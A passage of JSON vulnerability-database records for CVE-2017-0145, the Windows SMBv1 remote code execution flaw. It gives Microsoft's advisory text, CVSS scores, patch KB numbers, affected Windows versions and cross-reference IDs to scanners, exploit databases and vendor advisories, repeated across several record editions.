"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-28T20:07:07", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-28T20:07:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB4012216", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KBMS16-110, 3187754", "KB4013198", "KB4012598", "KB4014077", "KB3210720", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": 
"KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:07", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that 
the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", 
"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3210721", "KB4012212", "KB3177186", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB4012215", "KB3205409", "KB4012606", "KB3210720", "KB4012598", "KB4012216", "KB4013429", "KB4012214", "KB4014077", "KB3213986", "KB4013198", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, 
{"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", 
"kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core 
installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-03T20:42:24", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", 
"AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T20:42:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-03T20:42:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4012606", "KB4012215", "KB3212646", "KB4013429", "KB4014077", "KB3205401", "KB4012213", "KB4012212", "KB4012217", "KB3205409", "KB4012598", "KB3210721", "KB4012214", "KB3177186", "KB4013198", "KB3210720", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", 